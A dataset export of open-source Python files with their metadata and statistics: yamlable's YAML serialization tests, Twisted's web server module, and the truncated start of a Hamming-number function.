| 0.022859
| 0
| 0
| 0
| 0
| 0.003012
| 0
| 1
| 0.191919
| false
| 0
| 0.121212
| 0.030303
| 0.464646
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
865a20fd18fa17925d3611f9138e1d796448c4ce
| 9,001
|
py
|
Python
|
yamlable/tests/test_yamlable.py
|
smarie/python-yamlable
|
c726f5c56eea037968560ce83f9753bde1514991
|
[
"BSD-3-Clause"
] | 27
|
2018-07-12T17:09:41.000Z
|
2022-02-07T18:56:26.000Z
|
yamlable/tests/test_yamlable.py
|
smarie/python-yamlable
|
c726f5c56eea037968560ce83f9753bde1514991
|
[
"BSD-3-Clause"
] | 14
|
2018-07-10T08:09:21.000Z
|
2022-03-02T15:29:56.000Z
|
yamlable/tests/test_yamlable.py
|
smarie/python-yamlable
|
c726f5c56eea037968560ce83f9753bde1514991
|
[
"BSD-3-Clause"
] | 1
|
2020-09-22T16:13:51.000Z
|
2020-09-22T16:13:51.000Z
|
from copy import copy
try:
# Python 2 only:
from StringIO import StringIO
# create a variant that can serve as a context manager
class StringIO(StringIO):
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
self.close()
except ImportError:
from io import StringIO
try: # python 3.5+
from typing import Dict, Any
from yamlable import Y
except ImportError:
pass
import pytest
from yaml import dump, load
from yamlable import YamlAble, yaml_info
def test_yamlable_incomplete_description():
""" Tests that if __yaml_tag_suffix__ is not provided a YamlAble subclass cannot be declared """
with pytest.raises(NotImplementedError) as err_info:
class Foo(YamlAble):
# __yaml_tag_suffix__ = 'foo'
def __to_yaml_dict__(self):
# type: (...) -> Dict[str, Any]
return copy(vars(self))
@classmethod
def __from_yaml_dict__(cls, # type: Type[Y]
dct, # type: Dict[str, Any]
yaml_tag # type: str
):
# type: (...) -> Y
return Foo(**dct)
# instantiate
f = Foo()
# dump
f.dumps_yaml()
assert "does not seem to have a non-None '__yaml_tag_suffix__' field" in str(err_info.value)
def test_yamlable():
""" Tests that YamlAble works correctly """
@yaml_info(yaml_tag_ns='yaml.tests')
class Foo(YamlAble):
# __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
def __to_yaml_dict__(self):
# type: (...) -> Dict[str, Any]
return copy(vars(self))
@classmethod
def __from_yaml_dict__(cls, # type: Type[Y]
dct, # type: Dict[str, Any]
yaml_tag # type: str
):
# type: (...) -> Y
return Foo(**dct)
# instantiate
f = Foo(1, 'hello') # note:
# dump
y = f.dumps_yaml(default_flow_style=False)
assert y == """!yamlable/yaml.tests.Foo
a: 1
b: hello
"""
# dump io
class MemorizingStringIO(StringIO):
""" A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """
def close(self):
self.value = self.getvalue()
# super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one)
StringIO.close(self)
s = MemorizingStringIO()
f.dump_yaml(s, default_flow_style=False)
assert s.value == y
# dump pyyaml
assert dump(f, default_flow_style=False) == y
# load
assert f == Foo.loads_yaml(y)
# load io
assert f == Foo.load_yaml(StringIO(y))
# load pyyaml
assert f == load(y)
def test_yamlable_legacy_method_names():
""" Tests that YamlAbleMixIn works correctly """
global enc
global dec
enc, dec = False, False
@yaml_info(yaml_tag_ns='yaml.tests')
class FooLegacy(YamlAble):
# __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
def to_yaml_dict(self):
# type: (...) -> Dict[str, Any]
global enc
enc = True
return copy(vars(self))
@classmethod
def from_yaml_dict(cls, # type: Type[Y]
dct, # type: Dict[str, Any]
yaml_tag # type: str
):
# type: (...) -> Y
global dec
dec = True
return FooLegacy(**dct)
# instantiate
f = FooLegacy(1, 'hello')
# dump
y = f.dumps_yaml(default_flow_style=False)
assert y == """!yamlable/yaml.tests.FooLegacy
a: 1
b: hello
"""
# dump io
class MemorizingStringIO(StringIO):
""" A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """
def close(self):
self.value = self.getvalue()
# super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one)
StringIO.close(self)
s = MemorizingStringIO()
f.dump_yaml(s, default_flow_style=False)
assert s.value == y
# dump pyyaml
assert dump(f, default_flow_style=False) == y
# load
assert f == FooLegacy.loads_yaml(y)
# load io
assert f == FooLegacy.load_yaml(StringIO(y))
# load pyyaml
assert f == load(y)
assert enc
assert dec
# TODO override so that tag is not supported, to check error message
def test_yamlable_not_supported():
@yaml_info(yaml_tag_ns='yaml.tests')
class Foo_Err(YamlAble):
# __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
def __to_yaml_dict__(self):
# type: (...) -> Dict[str, Any]
return copy(vars(self))
@classmethod
def __from_yaml_dict__(cls, # type: Type[Y]
dct, # type: Dict[str, Any]
yaml_tag # type: str
):
# type: (...) -> Y
return Foo_Err(**dct)
@classmethod
def is_yaml_tag_supported(cls,
yaml_tag # type: str
):
# type: (...) -> bool
# ALWAYS return false
return False
with pytest.raises(TypeError) as err_info:
Foo_Err.loads_yaml("!yamlable/yaml.tests.Foo_Err {a: 1, b: hello}\n")
assert "No YamlAble subclass found able to decode object" in str(err_info.value)
def test_yamlable_default_impl():
""" tests that the default implementation works """
@yaml_info(yaml_tag_ns='yaml.tests')
class Foo_Default(YamlAble):
def __init__(self, a, b):
self.a = a
self.b = b
f = Foo_Default(1, 'hello')
s = """!yamlable/yaml.tests.Foo_Default
a: 1
b: hello
"""
assert dump(f, default_flow_style=False) == s
assert dump(load(dump(load(s))), default_flow_style=False) == s
def test_help_yaml_info():
@yaml_info("com.example.MyFoo")
class Foo(YamlAble):
pass
assert Foo.__yaml_tag_suffix__ == "com.example.MyFoo"
@yaml_info(yaml_tag_ns="com.example")
class Foo(YamlAble):
pass
assert Foo.__yaml_tag_suffix__ == "com.example.Foo"
assert Foo().dumps_yaml() == """!yamlable/com.example.Foo {}
"""
def test_abstract_parent_error():
"""This tests that we can define an abstract parent class with the YamlAble behaviour and inherit it"""
class AbstractFooE(YamlAble):
pass
class FooError(AbstractFooE):
"""
This class inherits from the parent without redefining a yaml tag
"""
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
# instantiate
e = FooError(1, 'hello')
# dump
with pytest.raises(NotImplementedError):
e.dumps_yaml()
def test_abstract_parent():
"""This tests that we can define an abstract parent class with the YamlAble behaviour and inherit it"""
class AbstractFooV(YamlAble):
pass
@yaml_info(yaml_tag_ns='yaml.tests')
class FooValid(AbstractFooV):
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
# instantiate
f = FooValid(1, 'hello') # note:
# dump
y = f.dumps_yaml(default_flow_style=False)
assert y == """!yamlable/yaml.tests.FooValid
a: 1
b: hello
"""
# dump io
class MemorizingStringIO(StringIO):
""" A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """
def close(self):
self.value = self.getvalue()
# super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one)
StringIO.close(self)
s = MemorizingStringIO()
f.dump_yaml(s, default_flow_style=False)
assert s.value == y
# dump pyyaml
assert dump(f, default_flow_style=False) == y
# load
assert f == FooValid.loads_yaml(y)
# load io
assert f == FooValid.load_yaml(StringIO(y))
# load pyyaml
assert f == load(y)
| 26.551622
| 115
| 0.56627
| 1,112
| 9,001
| 4.364209
| 0.146583
| 0.030291
| 0.036266
| 0.047599
| 0.653822
| 0.641665
| 0.641665
| 0.614259
| 0.588296
| 0.567278
| 0
| 0.002646
| 0.328297
| 9,001
| 338
| 116
| 26.630178
| 0.800033
| 0.232196
| 0
| 0.639175
| 0
| 0
| 0.072947
| 0.027909
| 0
| 0
| 0
| 0.002959
| 0.139175
| 1
| 0.170103
| false
| 0.025773
| 0.051546
| 0.06701
| 0.376289
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
865a984bc7cd45c042cff94434fa063630359314
| 29,537
|
py
|
Python
|
src/twisted/web/server.py
|
vmario/twisted
|
34f3d8f8c6f51772eaed92a89257ea011e9a818d
|
[
"Unlicense",
"MIT"
] | null | null | null |
src/twisted/web/server.py
|
vmario/twisted
|
34f3d8f8c6f51772eaed92a89257ea011e9a818d
|
[
"Unlicense",
"MIT"
] | null | null | null |
src/twisted/web/server.py
|
vmario/twisted
|
34f3d8f8c6f51772eaed92a89257ea011e9a818d
|
[
"Unlicense",
"MIT"
] | null | null | null |
# -*- test-case-name: twisted.web.test.test_web -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This is a web server which integrates with the twisted.internet infrastructure.
@var NOT_DONE_YET: A token value which L{twisted.web.resource.IResource.render}
implementations can return to indicate that the application will later call
C{.write} and C{.finish} to complete the request, and that the HTTP
connection should be left open.
@type NOT_DONE_YET: Opaque; do not depend on any particular type for this
value.
"""
import copy
import os
import re
from html import escape
from typing import List, Optional
from urllib.parse import quote as _quote
import zlib
from binascii import hexlify
from zope.interface import implementer
from twisted.python.compat import networkString, nativeString
from twisted.spread.pb import Copyable, ViewPoint
from twisted.internet import address, interfaces
from twisted.internet.error import AlreadyCalled, AlreadyCancelled
from twisted.web import iweb, http, util
from twisted.web.http import unquote
from twisted.python import reflect, failure, components
from twisted import copyright
from twisted.web import resource
from twisted.web.error import UnsupportedMethod
from incremental import Version
from twisted.python.deprecate import deprecatedModuleAttribute
from twisted.logger import Logger
NOT_DONE_YET = 1
__all__ = [
"supportedMethods",
"Request",
"Session",
"Site",
"version",
"NOT_DONE_YET",
"GzipEncoderFactory",
]
# backwards compatibility
deprecatedModuleAttribute(
Version("Twisted", 12, 1, 0),
"Please use twisted.web.http.datetimeToString instead",
"twisted.web.server",
"date_time_string",
)
deprecatedModuleAttribute(
Version("Twisted", 12, 1, 0),
"Please use twisted.web.http.stringToDatetime instead",
"twisted.web.server",
"string_date_time",
)
date_time_string = http.datetimeToString
string_date_time = http.stringToDatetime
# Support for other methods may be implemented on a per-resource basis.
supportedMethods = (b"GET", b"HEAD", b"POST")
def quote(string, *args, **kwargs):
return _quote(string.decode("charmap"), *args, **kwargs).encode("charmap")
def _addressToTuple(addr):
if isinstance(addr, address.IPv4Address):
return ("INET", addr.host, addr.port)
elif isinstance(addr, address.UNIXAddress):
return ("UNIX", addr.name)
else:
return tuple(addr)
@implementer(iweb.IRequest)
class Request(Copyable, http.Request, components.Componentized):
"""
An HTTP request.
@ivar defaultContentType: A L{bytes} giving the default I{Content-Type}
value to send in responses if no other value is set. L{None} disables
the default.
@ivar _insecureSession: The L{Session} object representing state that will
be transmitted over plain-text HTTP.
@ivar _secureSession: The L{Session} object representing the state that
will be transmitted only over HTTPS.
"""
defaultContentType = b"text/html"
site = None
appRootURL = None
prepath: Optional[List[bytes]] = None
postpath: Optional[List[bytes]] = None
__pychecker__ = "unusednames=issuer"
_inFakeHead = False
_encoder = None
_log = Logger()
def __init__(self, *args, **kw):
http.Request.__init__(self, *args, **kw)
components.Componentized.__init__(self)
def getStateToCopyFor(self, issuer):
x = self.__dict__.copy()
del x["transport"]
# XXX refactor this attribute out; it's from protocol
# del x['server']
del x["channel"]
del x["content"]
del x["site"]
self.content.seek(0, 0)
x["content_data"] = self.content.read()
x["remote"] = ViewPoint(issuer, self)
# Address objects aren't jellyable
x["host"] = _addressToTuple(x["host"])
x["client"] = _addressToTuple(x["client"])
# Header objects also aren't jellyable.
x["requestHeaders"] = list(x["requestHeaders"].getAllRawHeaders())
return x
# HTML generation helpers
def sibLink(self, name):
"""
Return the text that links to a sibling of the requested resource.
@param name: The sibling resource
@type name: C{bytes}
@return: A relative URL.
@rtype: C{bytes}
"""
if self.postpath:
return (len(self.postpath) * b"../") + name
else:
return name
def childLink(self, name):
"""
Return the text that links to a child of the requested resource.
@param name: The child resource
@type name: C{bytes}
@return: A relative URL.
@rtype: C{bytes}
"""
lpp = len(self.postpath)
if lpp > 1:
return ((lpp - 1) * b"../") + name
elif lpp == 1:
return name
else: # lpp == 0
if len(self.prepath) and self.prepath[-1]:
return self.prepath[-1] + b"/" + name
else:
return name
def gotLength(self, length):
"""
Called when HTTP channel got length of content in this request.
This method is not intended for users.
@param length: The length of the request body, as indicated by the
request headers. L{None} if the request headers do not indicate a
length.
"""
try:
getContentFile = self.channel.site.getContentFile
except AttributeError:
http.Request.gotLength(self, length)
else:
self.content = getContentFile(length)
def process(self):
"""
Process a request.
Find the addressed resource in this request's L{Site},
and call L{self.render()<Request.render()>} with it.
@see: L{Site.getResourceFor()}
"""
# get site from channel
self.site = self.channel.site
# set various default headers
self.setHeader(b"server", version)
self.setHeader(b"date", http.datetimeToString())
# Resource Identification
self.prepath = []
self.postpath = list(map(unquote, self.path[1:].split(b"/")))
# Short-circuit for requests whose path is '*'.
if self.path == b"*":
self._handleStar()
return
try:
resrc = self.site.getResourceFor(self)
if resource._IEncodingResource.providedBy(resrc):
encoder = resrc.getEncoder(self)
if encoder is not None:
self._encoder = encoder
self.render(resrc)
except BaseException:
self.processingFailed(failure.Failure())
def write(self, data):
"""
Write data to the transport (if not responding to a HEAD request).
@param data: A string to write to the response.
@type data: L{bytes}
"""
if not self.startedWriting:
# Before doing the first write, check to see if a default
# Content-Type header should be supplied. We omit it on
# NOT_MODIFIED and NO_CONTENT responses. We also omit it if there
# is a Content-Length header set to 0, as empty bodies don't need
# a content-type.
needsCT = self.code not in (http.NOT_MODIFIED, http.NO_CONTENT)
contentType = self.responseHeaders.getRawHeaders(b"content-type")
contentLength = self.responseHeaders.getRawHeaders(b"content-length")
contentLengthZero = contentLength and (contentLength[0] == b"0")
if (
needsCT
and contentType is None
and self.defaultContentType is not None
and not contentLengthZero
):
self.responseHeaders.setRawHeaders(
b"content-type", [self.defaultContentType]
)
# Only let the write happen if we're not generating a HEAD response by
# faking out the request method. Note, if we are doing that,
# startedWriting will never be true, and the above logic may run
# multiple times. It will only actually change the responseHeaders
# once though, so it's still okay.
if not self._inFakeHead:
if self._encoder:
data = self._encoder.encode(data)
http.Request.write(self, data)
def finish(self):
"""
Override C{http.Request.finish} for possible encoding.
"""
if self._encoder:
data = self._encoder.finish()
if data:
http.Request.write(self, data)
return http.Request.finish(self)
def render(self, resrc):
"""
Ask a resource to render itself.
If the resource does not support the requested method,
generate a C{NOT IMPLEMENTED} or C{NOT ALLOWED} response.
@param resrc: The resource to render.
@type resrc: L{twisted.web.resource.IResource}
@see: L{IResource.render()<twisted.web.resource.IResource.render()>}
"""
try:
body = resrc.render(self)
except UnsupportedMethod as e:
allowedMethods = e.allowedMethods
if (self.method == b"HEAD") and (b"GET" in allowedMethods):
# We must support HEAD (RFC 2616, 5.1.1). If the
# resource doesn't, fake it by giving the resource
# a 'GET' request and then return only the headers,
# not the body.
self._log.info(
"Using GET to fake a HEAD request for {resrc}", resrc=resrc
)
self.method = b"GET"
self._inFakeHead = True
body = resrc.render(self)
if body is NOT_DONE_YET:
self._log.info(
"Tried to fake a HEAD request for {resrc}, but "
"it got away from me.",
resrc=resrc,
)
# Oh well, I guess we won't include the content length.
else:
self.setHeader(b"content-length", b"%d" % (len(body),))
self._inFakeHead = False
self.method = b"HEAD"
self.write(b"")
self.finish()
return
if self.method in (supportedMethods):
# We MUST include an Allow header
# (RFC 2616, 10.4.6 and 14.7)
self.setHeader(b"Allow", b", ".join(allowedMethods))
s = (
"""Your browser approached me (at %(URI)s) with"""
""" the method "%(method)s". I only allow"""
""" the method%(plural)s %(allowed)s here."""
% {
"URI": escape(nativeString(self.uri)),
"method": nativeString(self.method),
"plural": ((len(allowedMethods) > 1) and "s") or "",
"allowed": ", ".join([nativeString(x) for x in allowedMethods]),
}
)
epage = resource.ErrorPage(http.NOT_ALLOWED, "Method Not Allowed", s)
body = epage.render(self)
else:
epage = resource.ErrorPage(
http.NOT_IMPLEMENTED,
"Huh?",
"I don't know how to treat a %s request."
% (escape(self.method.decode("charmap")),),
)
body = epage.render(self)
# end except UnsupportedMethod
if body is NOT_DONE_YET:
return
if not isinstance(body, bytes):
body = resource.ErrorPage(
http.INTERNAL_SERVER_ERROR,
"Request did not return bytes",
"Request: "
+ util._PRE(reflect.safe_repr(self))
+ "<br />"
+ "Resource: "
+ util._PRE(reflect.safe_repr(resrc))
+ "<br />"
+ "Value: "
+ util._PRE(reflect.safe_repr(body)),
).render(self)
if self.method == b"HEAD":
if len(body) > 0:
# This is a Bad Thing (RFC 2616, 9.4)
self._log.info(
"Warning: HEAD request {slf} for resource {resrc} is"
" returning a message body. I think I'll eat it.",
slf=self,
resrc=resrc,
)
self.setHeader(b"content-length", b"%d" % (len(body),))
self.write(b"")
else:
self.setHeader(b"content-length", b"%d" % (len(body),))
self.write(body)
self.finish()
def processingFailed(self, reason):
"""
Finish this request with an indication that processing failed and
possibly display a traceback.
@param reason: Reason this request has failed.
@type reason: L{twisted.python.failure.Failure}
@return: The reason passed to this method.
@rtype: L{twisted.python.failure.Failure}
"""
self._log.failure("", failure=reason)
if self.site.displayTracebacks:
body = (
b"<html><head><title>web.Server Traceback"
b" (most recent call last)</title></head>"
b"<body><b>web.Server Traceback"
b" (most recent call last):</b>\n\n"
+ util.formatFailure(reason)
+ b"\n\n</body></html>\n"
)
else:
body = (
b"<html><head><title>Processing Failed"
b"</title></head><body>"
b"<b>Processing Failed</b></body></html>"
)
self.setResponseCode(http.INTERNAL_SERVER_ERROR)
self.setHeader(b"content-type", b"text/html")
self.setHeader(b"content-length", b"%d" % (len(body),))
self.write(body)
self.finish()
return reason
def view_write(self, issuer, data):
"""Remote version of write; same interface."""
self.write(data)
def view_finish(self, issuer):
"""Remote version of finish; same interface."""
self.finish()
def view_addCookie(self, issuer, k, v, **kwargs):
"""Remote version of addCookie; same interface."""
self.addCookie(k, v, **kwargs)
def view_setHeader(self, issuer, k, v):
"""Remote version of setHeader; same interface."""
self.setHeader(k, v)
def view_setLastModified(self, issuer, when):
"""Remote version of setLastModified; same interface."""
self.setLastModified(when)
def view_setETag(self, issuer, tag):
"""Remote version of setETag; same interface."""
self.setETag(tag)
def view_setResponseCode(self, issuer, code, message=None):
"""
Remote version of setResponseCode; same interface.
"""
self.setResponseCode(code, message)
def view_registerProducer(self, issuer, producer, streaming):
"""Remote version of registerProducer; same interface.
(requires a remote producer.)
"""
self.registerProducer(_RemoteProducerWrapper(producer), streaming)
def view_unregisterProducer(self, issuer):
self.unregisterProducer()
### these calls remain local
_secureSession = None
_insecureSession = None
@property
def session(self):
"""
If a session has already been created or looked up with
L{Request.getSession}, this will return that object. (This will always
be the session that matches the security of the request; so if
C{forceNotSecure} is used on a secure request, this will not return
that session.)
@return: the session attribute
@rtype: L{Session} or L{None}
"""
if self.isSecure():
return self._secureSession
else:
return self._insecureSession
def getSession(self, sessionInterface=None, forceNotSecure=False):
"""
Check if there is a session cookie, and if not, create it.
By default, the cookie with be secure for HTTPS requests and not secure
for HTTP requests. If for some reason you need access to the insecure
cookie from a secure request you can set C{forceNotSecure = True}.
@param forceNotSecure: Should we retrieve a session that will be
transmitted over HTTP, even if this L{Request} was delivered over
HTTPS?
@type forceNotSecure: L{bool}
"""
# Make sure we aren't creating a secure session on a non-secure page
secure = self.isSecure() and not forceNotSecure
if not secure:
cookieString = b"TWISTED_SESSION"
sessionAttribute = "_insecureSession"
else:
cookieString = b"TWISTED_SECURE_SESSION"
sessionAttribute = "_secureSession"
session = getattr(self, sessionAttribute)
if session is not None:
# We have a previously created session.
try:
# Refresh the session, to keep it alive.
session.touch()
except (AlreadyCalled, AlreadyCancelled):
# Session has already expired.
session = None
if session is None:
# No session was created yet for this request.
cookiename = b"_".join([cookieString] + self.sitepath)
sessionCookie = self.getCookie(cookiename)
if sessionCookie:
try:
session = self.site.getSession(sessionCookie)
except KeyError:
pass
# if it still hasn't been set, fix it up.
if not session:
session = self.site.makeSession()
self.addCookie(cookiename, session.uid, path=b"/", secure=secure)
setattr(self, sessionAttribute, session)
if sessionInterface:
return session.getComponent(sessionInterface)
return session
def _prePathURL(self, prepath):
port = self.getHost().port
if self.isSecure():
default = 443
else:
default = 80
if port == default:
hostport = ""
else:
hostport = ":%d" % port
prefix = networkString(
"http%s://%s%s/"
% (
self.isSecure() and "s" or "",
nativeString(self.getRequestHostname()),
hostport,
)
)
path = b"/".join([quote(segment, safe=b"") for segment in prepath])
return prefix + path
def prePathURL(self):
return self._prePathURL(self.prepath)
def URLPath(self):
from twisted.python import urlpath
return urlpath.URLPath.fromRequest(self)
def rememberRootURL(self):
"""
Remember the currently-processed part of the URL for later
recalling.
"""
url = self._prePathURL(self.prepath[:-1])
self.appRootURL = url
def getRootURL(self):
"""
Get a previously-remembered URL.
@return: An absolute URL.
@rtype: L{bytes}
"""
return self.appRootURL
def _handleStar(self):
"""
Handle receiving a request whose path is '*'.
RFC 7231 defines an OPTIONS * request as being something that a client
can send as a low-effort way to probe server capabilities or readiness.
Rather than bother the user with this, we simply fast-path it back to
an empty 200 OK. Any non-OPTIONS verb gets a 405 Method Not Allowed
telling the client they can only use OPTIONS.
"""
if self.method == b"OPTIONS":
self.setResponseCode(http.OK)
else:
self.setResponseCode(http.NOT_ALLOWED)
self.setHeader(b"Allow", b"OPTIONS")
# RFC 7231 says we MUST set content-length 0 when responding to this
# with no body.
self.setHeader(b"Content-Length", b"0")
self.finish()
@implementer(iweb._IRequestEncoderFactory)
class GzipEncoderFactory:
"""
@cvar compressLevel: The compression level used by the compressor, default
to 9 (highest).
@since: 12.3
"""
_gzipCheckRegex = re.compile(br"(:?^|[\s,])gzip(:?$|[\s,])")
compressLevel = 9
def encoderForRequest(self, request):
"""
Check the headers if the client accepts gzip encoding, and encodes the
request if so.
"""
acceptHeaders = b",".join(
request.requestHeaders.getRawHeaders(b"accept-encoding", [])
)
if self._gzipCheckRegex.search(acceptHeaders):
encoding = request.responseHeaders.getRawHeaders(b"content-encoding")
if encoding:
encoding = b",".join(encoding + [b"gzip"])
else:
encoding = b"gzip"
request.responseHeaders.setRawHeaders(b"content-encoding", [encoding])
return _GzipEncoder(self.compressLevel, request)
@implementer(iweb._IRequestEncoder)
class _GzipEncoder:
"""
An encoder which supports gzip.
@ivar _zlibCompressor: The zlib compressor instance used to compress the
stream.
@ivar _request: A reference to the originating request.
@since: 12.3
"""
_zlibCompressor = None
def __init__(self, compressLevel, request):
self._zlibCompressor = zlib.compressobj(
compressLevel, zlib.DEFLATED, 16 + zlib.MAX_WBITS
)
self._request = request
def encode(self, data):
"""
Write to the request, automatically compressing data on the fly.
"""
if not self._request.startedWriting:
# Remove the content-length header, we can't honor it
# because we compress on the fly.
self._request.responseHeaders.removeHeader(b"content-length")
return self._zlibCompressor.compress(data)
def finish(self):
"""
Finish handling the request request, flushing any data from the zlib
buffer.
"""
remain = self._zlibCompressor.flush()
self._zlibCompressor = None
return remain
class _RemoteProducerWrapper:
def __init__(self, remote):
self.resumeProducing = remote.remoteMethod("resumeProducing")
self.pauseProducing = remote.remoteMethod("pauseProducing")
self.stopProducing = remote.remoteMethod("stopProducing")
class Session(components.Componentized):
"""
A user's session with a system.
This utility class contains no functionality, but is used to
represent a session.
@ivar site: The L{Site} that generated the session.
@type site: L{Site}
@ivar uid: A unique identifier for the session.
@type uid: L{bytes}
@ivar _reactor: An object providing L{IReactorTime} to use for scheduling
expiration.
@ivar sessionTimeout: Time after last modification the session will expire,
in seconds.
@type sessionTimeout: L{float}
@ivar lastModified: Time the C{touch()} method was last called (or time the
session was created). A UNIX timestamp as returned by
L{IReactorTime.seconds()}.
@type lastModified: L{float}
"""
sessionTimeout = 900
_expireCall = None
def __init__(self, site, uid, reactor=None):
"""
Initialize a session with a unique ID for that session.
@param reactor: L{IReactorTime} used to schedule expiration of the
session. If C{None}, the reactor associated with I{site} is used.
"""
super().__init__()
if reactor is None:
reactor = site.reactor
self._reactor = reactor
self.site = site
self.uid = uid
self.expireCallbacks = []
self.touch()
self.sessionNamespaces = {}
def startCheckingExpiration(self):
"""
Start expiration tracking.
@return: L{None}
"""
self._expireCall = self._reactor.callLater(self.sessionTimeout, self.expire)
def notifyOnExpire(self, callback):
"""
Call this callback when the session expires or logs out.
"""
self.expireCallbacks.append(callback)
def expire(self):
"""
Expire/logout of the session.
"""
del self.site.sessions[self.uid]
for c in self.expireCallbacks:
c()
self.expireCallbacks = []
if self._expireCall and self._expireCall.active():
self._expireCall.cancel()
# Break reference cycle.
self._expireCall = None
def touch(self):
"""
Mark the session as modified, which resets expiration timer.
"""
self.lastModified = self._reactor.seconds()
if self._expireCall is not None:
self._expireCall.reset(self.sessionTimeout)
version = networkString(f"TwistedWeb/{copyright.version}")
@implementer(interfaces.IProtocolNegotiationFactory)
class Site(http.HTTPFactory):
"""
A web site: manage log, sessions, and resources.
@ivar requestFactory: A factory which is called with (channel)
and creates L{Request} instances. Default to L{Request}.
@ivar displayTracebacks: If set, unhandled exceptions raised during
rendering are returned to the client as HTML. Default to C{False}.
@ivar sessionFactory: factory for sessions objects. Default to L{Session}.
@ivar sessions: Mapping of session IDs to objects returned by
C{sessionFactory}.
@type sessions: L{dict} mapping L{bytes} to L{Session} given the default
C{sessionFactory}
@ivar counter: The number of sessions that have been generated.
@type counter: L{int}
@ivar sessionCheckTime: Deprecated and unused. See
L{Session.sessionTimeout} instead.
"""
counter = 0
requestFactory = Request
displayTracebacks = False
sessionFactory = Session
sessionCheckTime = 1800
_entropy = os.urandom
def __init__(self, resource, requestFactory=None, *args, **kwargs):
"""
@param resource: The root of the resource hierarchy. All request
traversal for requests received by this factory will begin at this
resource.
@type resource: L{IResource} provider
@param requestFactory: Overwrite for default requestFactory.
@type requestFactory: C{callable} or C{class}.
@see: L{twisted.web.http.HTTPFactory.__init__}
"""
super().__init__(*args, **kwargs)
self.sessions = {}
self.resource = resource
if requestFactory is not None:
self.requestFactory = requestFactory
def _openLogFile(self, path):
from twisted.python import logfile
return logfile.LogFile(os.path.basename(path), os.path.dirname(path))
def __getstate__(self):
d = self.__dict__.copy()
d["sessions"] = {}
return d
def _mkuid(self):
"""
(internal) Generate an opaque, unique ID for a user's session.
"""
self.counter = self.counter + 1
return hexlify(self._entropy(32))
def makeSession(self):
"""
Generate a new Session instance, and store it for future reference.
"""
uid = self._mkuid()
session = self.sessions[uid] = self.sessionFactory(self, uid)
session.startCheckingExpiration()
return session
def getSession(self, uid):
"""
Get a previously generated session.
@param uid: Unique ID of the session.
@type uid: L{bytes}.
@raise KeyError: If the session is not found.
"""
return self.sessions[uid]
def buildProtocol(self, addr):
"""
Generate a channel attached to this site.
"""
channel = super().buildProtocol(addr)
channel.requestFactory = self.requestFactory
channel.site = self
return channel
isLeaf = 0
def render(self, request):
"""
Redirect because a Site is always a directory.
"""
request.redirect(request.prePathURL() + b"/")
request.finish()
def getChildWithDefault(self, pathEl, request):
"""
Emulate a resource's getChild method.
"""
request.site = self
return self.resource.getChildWithDefault(pathEl, request)
def getResourceFor(self, request):
"""
Get a resource for a request.
This iterates through the resource hierarchy, calling
getChildWithDefault on each resource it finds for a path element,
stopping when it hits an element where isLeaf is true.
"""
request.site = self
# Sitepath is used to determine cookie names between distributed
# servers and disconnected sites.
request.sitepath = copy.copy(request.prepath)
return resource.getChildForRequest(self.resource, request)
# IProtocolNegotiationFactory
def acceptableProtocols(self):
"""
Protocols this server can speak.
"""
baseProtocols = [b"http/1.1"]
if http.H2_ENABLED:
baseProtocols.insert(0, b"h2")
return baseProtocols
| 32.601545
| 88
| 0.593561
| 3,276
| 29,537
| 5.295788
| 0.213065
| 0.008877
| 0.00807
| 0.007263
| 0.090783
| 0.055969
| 0.040636
| 0.03372
| 0.029454
| 0.02565
| 0
| 0.004778
| 0.312693
| 29,537
| 905
| 89
| 32.637569
| 0.84981
| 0.317026
| 0
| 0.161572
| 0
| 0
| 0.081838
| 0.013387
| 0
| 0
| 0
| 0
| 0
| 1
| 0.10917
| false
| 0.002183
| 0.052402
| 0.004367
| 0.303493
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
865af347d7d59f9bd67eb9dbfa07a221fbd308e5
| 554
|
py
|
Python
|
Pset/hamming_numbers.py
|
MarkHershey/python-learning
|
8d6c87941af6db5878b59483526ed402f4b319b3
|
[
"MIT"
] | 9
|
2020-06-05T17:01:23.000Z
|
2022-03-16T19:55:50.000Z
|
Pset/hamming_numbers.py
|
MarkHershey/python-learning
|
8d6c87941af6db5878b59483526ed402f4b319b3
|
[
"MIT"
] | null | null | null |
Pset/hamming_numbers.py
|
MarkHershey/python-learning
|
8d6c87941af6db5878b59483526ed402f4b319b3
|
[
"MIT"
] | null | null | null |
def hamming(n):
"""Returns the nth hamming number"""
hamming = {1}
x = 1
while len(hamming) <= n * 3.5:
new_hamming = {1}
for i in hamming:
new_hamming.add(i * 2)
